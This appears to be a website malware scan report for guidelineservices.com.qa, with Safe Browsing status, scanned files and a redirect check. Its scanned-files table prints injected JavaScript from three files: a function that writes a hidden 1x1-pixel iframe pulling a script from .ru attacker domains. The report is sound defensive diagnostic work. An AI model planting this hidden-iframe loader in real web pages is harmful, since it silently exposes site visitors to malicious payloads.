Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=guidelineservices.com.qa
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.guidelineservices.com.qa/ | 200 OK Content-Length: 13853 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() { var jygtd = document.createElement('iframe'); jygtd.src = 'http://ycsycxyd.ru/count29.php'; jygtd.style.position = 'absolute'; jygtd.style.border = '0'; jygtd.style.height = '1px'; jygtd.style.width = '1px'; jygtd.style.left = '1px'; jygtd.style.top = '1px'; if (!document.getElementById('jygtd')) { document.write('<div id=\'jygtd\'></div>'); document.getElementById('jygtd').appendChild(jygtd); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = n Antivirus reports:
| ||
http://cdn.jotfor.ms/jotform.jgz?3.1.110 | 200 OK Content-Length: 302220 Content-Type: application/x-javascript | clean |
http://www.guidelineservices.com.qa/curvycorners.src.js | 200 OK Content-Length: 69318 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() {
var ekc = document.createElement('iframe');
ekc.src = 'http://ycsycxyd.ru/count29.php';
ekc.style.position = 'absolute';
ekc.style.border = '0';
ekc.style.height = '1px';
ekc.style.width = '1px';
ekc.style.left = '1px';
ekc.style.top = '1px';
if (!document.getElementById('ekc')) {
document.write('<div id=\'ekc\'></div>');
document.getElementById('ekc').appendChild(ekc);
}
}
function SetCookie(cookieName,c ...[837 bytes skipped]... Antivirus reports:
| ||
http://www.guidelineservices.com.qa/curvycorners.js | 200 OK Content-Length: 38183 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function zzzfff() {
var mlkv = document.createElement('iframe');
mlkv.src = 'http://qiqojahe.ru/count29.php';
mlkv.style.position = 'absolute';
mlkv.style.border = '0';
mlkv.style.height = '1px';
mlkv.style.width = '1px';
mlkv.style.left = '1px';
mlkv.style.top = '1px';
if (!document.getElementById('mlkv')) {
document.write('<div id=\'mlkv\'></div>');
document.getElementById('mlkv').appendChild(mlkv);
}
}
function SetCookie( ...[849 bytes skipped]... Antivirus reports:
| ||
http://www.guidelineservices.com.qa/raphael-min.js | 404 Not Found Content-Length: 538 Content-Type: text/html | clean |
http://www.guidelineservices.com.qa/test404page.js | 404 Not Found Content-Length: 538 Content-Type: text/html | clean |
http://www.guidelineservices.com.qa/cufon.js | 404 Not Found Content-Length: 538 Content-Type: text/html | clean |
http://www.guidelineservices.com.qa/tweet.js | 404 Not Found Content-Length: 538 Content-Type: text/html | clean |
http://www.go2web20.net/twitterfollowbadge/1.0/badge.js | 200 OK Content-Length: 2153 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: guidelineservices.com.qa
Result:
GET / HTTP/1.1
Host: guidelineservices.com.qa
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: guidelineservices.com.qa
Referer: http://www.google.com/search?q=guidelineservices.com.qa
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: guidelineservices.com.qa
Referer: http://www.google.com/search?q=guidelineservices.com.qa
Result:
The result is similar to the first query. There are no suspicious redirects found.